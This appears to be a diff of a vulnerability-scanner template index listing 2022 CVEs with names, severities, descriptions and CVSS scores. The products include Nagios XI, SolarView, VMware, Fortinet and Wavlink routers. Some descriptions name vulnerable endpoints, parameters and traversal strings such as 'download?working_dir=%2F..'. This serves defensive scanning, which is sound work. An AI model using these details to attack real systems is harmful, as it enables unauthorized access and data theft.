{"ID":"CVE-2022-29272","Info":{"Name":"Nagios XI \u003c5.8.5 - Open Redirect","Severity":"medium","Description":"Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29272.yaml"}
{"ID":"CVE-2022-29298","Info":{"Name":"SolarView Compact 6.00 - Local File Inclusion","Severity":"high","Description":"SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-29298.yaml"}
{"ID":"CVE-2022-29299","Info":{"Name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","Severity":"medium","Description":"SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-29299.yaml"}
@ -1466,8 +1480,8 @@
{"ID":"CVE-2022-31299","Info":{"Name":"Haraj 3.7 - Cross-Site Scripting","Severity":"medium","Description":"Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-31299.yaml"}
{"ID":"CVE-2022-31373","Info":{"Name":"SolarView Compact 6.00 - Cross-Site Scripting","Severity":"medium","Description":"SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-31373.yaml"}
{"ID":"CVE-2022-31474","Info":{"Name":"BackupBuddy - Local File Inclusion","Severity":"high","Description":"BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31474.yaml"}
{"ID":"CVE-2022-31656","Info":{"Name":"VMware - Authentication Bypass","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-31656.yaml"}
{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c= 1.1.5 - Path traversal","Severity":"high","Description":"A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31793.yaml"}
{"ID":"CVE-2022-31656","Info":{"Name":"VMware - Local File Inclusion","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-31656.yaml"}
{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31793.yaml"}
{"ID":"CVE-2022-31798","Info":{"Name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-31798.yaml"}
{"ID":"CVE-2022-31814","Info":{"Name":"pfSense pfBlockerNG \u003c=2.1..4_26 - OS Command Injection","Severity":"critical","Description":"pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-31814.yaml"}
{"ID":"CVE-2022-31845","Info":{"Name":"WAVLINK WN535 G3 - Information Disclosure","Severity":"high","Description":"A vulnerability in live_check.shtml of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to obtain sensitive router information via execution of the exec cmd function.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-31845.yaml"}
@ -1484,6 +1498,7 @@
{"ID":"CVE-2022-32094","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-32094.yaml"}
{"ID":"CVE-2022-32195","Info":{"Name":"Open edX \u003c2022-06-06 - Cross-Site Scripting","Severity":"medium","Description":"Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32195.yaml"}
{"ID":"CVE-2022-32409","Info":{"Name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","Severity":"critical","Description":"Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-32409.yaml"}
{"ID":"CVE-2022-32429","Info":{"Name":"MSNSwitch Firmware MNT.2408 - Configuration Dump","Severity":"critical","Description":"The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-32429.yaml"}
{"ID":"CVE-2022-32444","Info":{"Name":"u5cms v8.3.5 - Open Redirect","Severity":"medium","Description":"u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32444.yaml"}
{"ID":"CVE-2022-32770","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32770.yaml"}
{"ID":"CVE-2022-32771","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-32771.yaml"}
@ -1498,7 +1513,7 @@
{"ID":"CVE-2022-34047","Info":{"Name":"Wavlink Set_safety.shtml - Password Exposure","Severity":"high","Description":"An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34047.yaml"}
{"ID":"CVE-2022-34048","Info":{"Name":"Wavlink WN-533A8 - Cross-Site Scripting","Severity":"medium","Description":"Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-34048.yaml"}
{"ID":"CVE-2022-34049","Info":{"Name":"Wavlink Exportlogs.sh - Configuration Exposure","Severity":"medium","Description":"An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-34049.yaml"}
{"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34121.yaml"}
{"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34121.yaml"}
{"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-34328.yaml"}
{"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Access Control","Severity":"high","Description":"A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-34576.yaml"}
{"ID":"CVE-2022-34590","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-34590.yaml"}
@ -1506,36 +1521,38 @@
{"ID":"CVE-2022-3506","Info":{"Name":"WordPress Related Posts \u003c2.1.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-3506.yaml"}
{"ID":"CVE-2022-35151","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-35151.yaml"}
{"ID":"CVE-2022-35405","Info":{"Name":"Zoho ManageEngine - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35405.yaml"}
{"ID":"CVE-2022-35413","Info":{"Name":"Wapples Web Application Firewall - Hardcoded credentials","Severity":"critical","Description":"WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35413.yaml"}
{"ID":"CVE-2022-35413","Info":{"Name":"WAPPLES Web Application Firewall \u003c=6.0 - Hardcoded Credentials","Severity":"critical","Description":"WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35413.yaml"}
{"ID":"CVE-2022-35416","Info":{"Name":"H3C SSL VPN \u003c=2022-07-10 - Cross-Site Scripting","Severity":"medium","Description":"H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-35416.yaml"}
{"ID":"CVE-2022-35493","Info":{"Name":"eShop 3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-35493.yaml"}
{"ID":"CVE-2022-3578","Info":{"Name":"WordPress ProfileGrid \u003c5.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-3578.yaml"}
{"ID":"CVE-2022-35914","Info":{"Name":"GLPI \u003c=10.0.2 - Remote Command Execution","Severity":"critical","Description":"GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-35914.yaml"}
{"ID":"CVE-2022-36642","Info":{"Name":"Omnia MPX 1.5.0+r1 - Path Traversal","Severity":"critical","Description":"A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-36642.yaml"}
{"ID":"CVE-2022-36537","Info":{"Name":"ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 - Sensitive Information Disclosure","Severity":"high","Description":"ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-36537.yaml"}
{"ID":"CVE-2022-36642","Info":{"Name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","Severity":"critical","Description":"Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-36642.yaml"}
{"ID":"CVE-2022-36804","Info":{"Name":"Atlassian Bitbucket Command Injection Vulnerability","Severity":"high","Description":"Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-36804.yaml"}
{"ID":"CVE-2022-36883","Info":{"Name":"Git Plugin up to 4.11.3 on Jenkins Build Authorization","Severity":"high","Description":"A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-36883.yaml"}
{"ID":"CVE-2022-37042","Info":{"Name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","Severity":"critical","Description":"Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-37042.yaml"}
{"ID":"CVE-2022-37153","Info":{"Name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","Severity":"medium","Description":"Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-37153.yaml"}
{"ID":"CVE-2022-37299","Info":{"Name":"Shirne CMS 1.2.0. - Path Traversal","Severity":"medium","Description":"Shirne CMS 1.2.0 There is a Path Traversal vulnerability which could cause arbitrary file read via /static/ueditor/php/controller.php","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-37299.yaml"}
{"ID":"CVE-2022-3768","Info":{"Name":"WPSmartContracts \u003c 1.3.12 - Author SQLi","Severity":"high","Description":"The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-3768.yaml"}
{"ID":"CVE-2022-37299","Info":{"Name":"Shirne CMS 1.2.0 - Local File Inclusion","Severity":"medium","Description":"Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-37299.yaml"}
{"ID":"CVE-2022-3768","Info":{"Name":"WordPress WPSmartContracts \u003c1.3.12 - SQL Injection","Severity":"high","Description":"WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-3768.yaml"}
{"ID":"CVE-2022-38463","Info":{"Name":"ServiceNow - Cross-Site Scripting","Severity":"medium","Description":"ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-38463.yaml"}
{"ID":"CVE-2022-38553","Info":{"Name":"Academy Learning Management System \u003c5.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-38553.yaml"}
{"ID":"CVE-2022-38637","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-38637.yaml"}
{"ID":"CVE-2022-38794","Info":{"Name":"Zaver - Local File Inclusion","Severity":"high","Description":"Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38794.yaml"}
{"ID":"CVE-2022-38794","Info":{"Name":"Zaver - Local File Inclusion","Severity":"high","Description":"Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38794.yaml"}
{"ID":"CVE-2022-38817","Info":{"Name":"Dapr Dashboard - Unauthorized Access","Severity":"high","Description":"Dapr Dashboard v0.1.0 through v0.10.0 is vulnerable to Incorrect Access Control that allows attackers to obtain sensitive data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38817.yaml"}
{"ID":"CVE-2022-38870","Info":{"Name":"Free5gc - Information disclosure","Severity":"high","Description":"Free5gc v3.2.1 is vulnerable to Information disclosure.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38870.yaml"}
{"ID":"CVE-2022-39195","Info":{"Name":"LISTSERV v17 - Cross Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the \"c\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-39195.yaml"}
{"ID":"CVE-2022-39960","Info":{"Name":"Atlassian Jira addon Netic Group Export \u003c 1.0.3 - Unauthenticated Access","Severity":"medium","Description":"The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-39960.yaml"}
{"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2022/CVE-2022-40083.yaml"}
{"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40359.yaml"}
{"ID":"CVE-2022-4050","Info":{"Name":"JoomSport \u003c 5.2.8 - Unauthenticated SQLi","Severity":"critical","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4050.yaml"}
{"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4050.yaml"}
{"ID":"CVE-2022-40684","Info":{"Name":"Fortinet - Authentication Bypass","Severity":"critical","Description":"Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-40684.yaml"}
{"ID":"CVE-2022-40734","Info":{"Name":"UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal","Severity":"medium","Description":"UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-40734.yaml"}
{"ID":"CVE-2022-40734","Info":{"Name":"Laravel Filemanager v2.5.1 - Local File Inclusion","Severity":"medium","Description":"Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-40734.yaml"}
{"ID":"CVE-2022-40879","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40879.yaml"}
{"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-40881.yaml"}
{"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-40881.yaml"}
{"ID":"CVE-2022-41473","Info":{"Name":"RPCMS 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-41473.yaml"}
{"ID":"CVE-2022-41840","Info":{"Name":"Welcart eCommerce \u003c= 2.7.7 - Unauth Directory Traversal","Severity":"critical","Description":"Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin \u003c= 2.7.7 on WordPress.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-41840.yaml"}
{"ID":"CVE-2022-41840","Info":{"Name":"Welcart eCommerce \u003c=2.7.7 - Local File Inclusion","Severity":"critical","Description":"Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-41840.yaml"}
{"ID":"CVE-2022-42233","Info":{"Name":"Tenda 11N - Authentication Bypass","Severity":"critical","Description":"Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-42233.yaml"}
{"ID":"CVE-2022-4260","Info":{"Name":"WP-Ban \u003c 1.69.1 - Admin Stored XSS","Severity":"high","Description":"The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-4260.yaml"}
{"ID":"CVE-2022-4260","Info":{"Name":"WordPress WP-Ban \u003c1.69.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2022/CVE-2022-4260.yaml"}
{"ID":"CVE-2022-42746","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42746.yaml"}
{"ID":"CVE-2022-42747","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42747.yaml"}
{"ID":"CVE-2022-42748","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42748.yaml"}
@ -1545,8 +1562,11 @@
{"ID":"CVE-2022-43016","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43016.yaml"}
{"ID":"CVE-2022-43017","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43017.yaml"}
